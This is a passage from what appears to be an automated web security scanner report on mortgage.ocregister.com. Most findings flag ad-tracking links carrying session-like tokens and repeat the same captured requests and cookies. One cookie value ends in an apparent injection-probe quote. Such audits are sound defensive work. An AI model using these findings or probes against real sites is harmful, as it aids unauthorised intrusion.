<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.40. http://mortgage.ocregister.com/2010/04/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/04/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/04/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.41. http://mortgage.ocregister.com/2010/05/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/05/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/05/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.42. http://mortgage.ocregister.com/2010/06/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/06/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/06/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 103788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.43. http://mortgage.ocregister.com/2010/07/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/07/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/07/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.44. http://mortgage.ocregister.com/2010/08/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/08/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/08/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 104326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.45. http://mortgage.ocregister.com/2010/09/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/09/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/09/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 102779

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.46. http://mortgage.ocregister.com/2010/10/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/10/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/10/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 97477

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.47. http://mortgage.ocregister.com/2010/11/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/11/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/11/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.48. http://mortgage.ocregister.com/2010/12/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/12/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/12/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 115660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.49. http://mortgage.ocregister.com/2011/01/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/01/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/01/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99950

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.50. http://mortgage.ocregister.com/2011/01/08/upside-down-but-still-on-a-good-path/41162/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/01/08/upside-down-but-still-on-a-good-path/41162/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/01/08/upside-down-but-still-on-a-good-path/41162/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:08:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41162>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:08:23 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.51. http://mortgage.ocregister.com/2011/01/13/late-o-c-mortgage-payments-drop/41334/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/01/13/late-o-c-mortgage-payments-drop/41334/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/01/13/late-o-c-mortgage-payments-drop/41334/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:08:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41334>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:08:08 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 74203

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.52. http://mortgage.ocregister.com/2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:08:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41340>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:08:02 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 80335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.53. http://mortgage.ocregister.com/2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41384>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:07:49 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.54. http://mortgage.ocregister.com/2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41318>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:07:47 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.55. http://mortgage.ocregister.com/2011/01/25/foreclosures-down-31-in-state/41514/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/01/25/foreclosures-down-31-in-state/41514/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/01/25/foreclosures-down-31-in-state/41514/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41514>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:07:44 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 78404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.56. http://mortgage.ocregister.com/2011/01/26/7900-o-c-homes-seized-in-2010/41532/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/01/26/7900-o-c-homes-seized-in-2010/41532/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/01/26/7900-o-c-homes-seized-in-2010/41532/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41532>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:07:38 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 114290

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.57. http://mortgage.ocregister.com/2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41590>; rel=shortlink
